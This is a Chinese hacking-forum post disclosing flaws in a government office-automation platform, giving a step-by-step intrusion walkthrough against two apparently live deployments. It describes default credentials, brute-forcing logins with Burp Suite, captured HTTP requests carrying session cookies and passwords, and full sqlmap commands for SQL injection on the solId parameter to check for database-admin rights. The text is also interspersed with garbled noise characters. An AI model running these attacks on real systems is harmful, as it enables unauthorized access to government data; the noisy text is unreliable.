& C- K( Y, _5 i8 T
平台简介:
4 M- d& q5 x" s% T1 O/ | 0 x) l0 [7 h+ S+ g3 O$ b6 w5 Q
* q$ D) e6 o0 a9 b* y2 e1 W0 D3 S- _1 @2 {# v
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!) W& z) H4 D5 T/ I f' i
8 L) u! b' s% S: m , [; `8 \: g& Y0 Q; k( K
- L+ y: B, Z% T" U: Z$ l$ }0 a9 M, d- @ 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
% L) {0 m5 J/ X4 `2 a4 i0 a. l9 O# u3 e" I; M! i8 j4 }( V " z3 X. i4 u- J
. Z; ?# r- ]2 [# G0 ~8 g+ M$ o2 a @; x |+ ? http://1.1.1.1:7197/cap-aco/#(案例2-)
http://www.XXOO.com (案例1-官网网站)
; @' O8 L9 k8 `# l& V* M$ [1 |1 s" Y5 L2 A5 t) K: f2 N 0 k; L2 v! u4 R2 i9 X
漏洞详情:6 e* k- w8 F; x! M4 l" O" ~/ k
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:9 g N& |5 }& Q7 p
( D1 U) g+ K/ x B2 h# F3 r
& G0 p; r$ _; p9 b9 ~
" y5 s: t' ^3 ~5 J1 l
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
# w8 ?8 _3 P8 m! u& j1、案例1-官方网站
, ^ Z' S/ `4 c6 ^GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
& g. S6 C1 ?6 v0 F! g( w* B Host: www.XXOO.com
Proxy-Connection: Keep-Alive
/ J. [( u: F8 L; G/ n* X. aAccept: application/json, text/javascript, */*; q=0.013 y! Z6 J: H/ y3 M# X4 o
Accept-Language: zh-CN
Content-Type: application/json
% ~; R5 [ B+ ]' ]# o3 G$ u: m; r0 k$ r* k, ^; e: {5 {5 J; ]" v User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
X-Requested-With: XMLHttpRequest
+ o% Z) f$ s$ T& BReferer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
+ H9 d: S# m# C+ P& H: a& v1 S Accept-Encoding: gzip, deflate, sdch
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e8 N! a( D6 T2 V+ |
4 c7 A3 [0 e J1 n2 z$ s& h& G$ ?2 b& j1 M0 w5 g. X2 e; O! Z* ^ n7 i 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
& T; N. S2 `0 o4 Z1 @6 B4 S8 Q
6 ~: k$ G! [8 @5 Q: _2 f
( ^( o% i: ^" C1 a0 d
: b8 |! u8 {) U P0 M d& s+ e7 I; ~) W) ^! a! y * _! M! t$ T: {: P& ]
& ^. T) J1 f7 g5 F0 b
0 M) S8 ^8 [3 m: ]% A& P; k) N2、案例2-某天河云平台
1 Y3 H3 A: v6 m" SGET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.12 m, U" u9 T: M! l" A# d
& Z2 G( n' Z' x) k, X& {Host: 1.1.1.:7197
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0' d( [0 W, T! K y* z2 X
9 Y6 Z& a+ Q' m# Z3 V7 Z: ]- E! @& \0 j+ b( l) ~0 a1 p Content-Type: application/json
f o7 f( W0 }! s5 M) n- @2 J0 h l- s2 j Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10081 G5 u9 S5 b5 s2 }* ~( C3 ~5 c) y
; ?! x2 C* s: d, ?Accept-Language: zh-CN,zh;q=0.8* O8 r; d( A6 ^0 U/ x" S
) a4 @" I9 Z$ H# H# G Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=18 z; ~" F) v; j2 B) o6 J) Z4 N; b
1 u: i1 `5 h# M7 v% y4 H7 T# o% D4 i( r5 w% Z# h/ D Connection: close) j: {0 b' s# A# ]0 R/ o0 _
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:* v, U1 p; r8 C
% y: f1 v" D! C( N0 v% ~8 o2 m" \8 V4 N1 o
# T; T0 H4 T+ s- V Y4 I( e2 t& z1 s
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |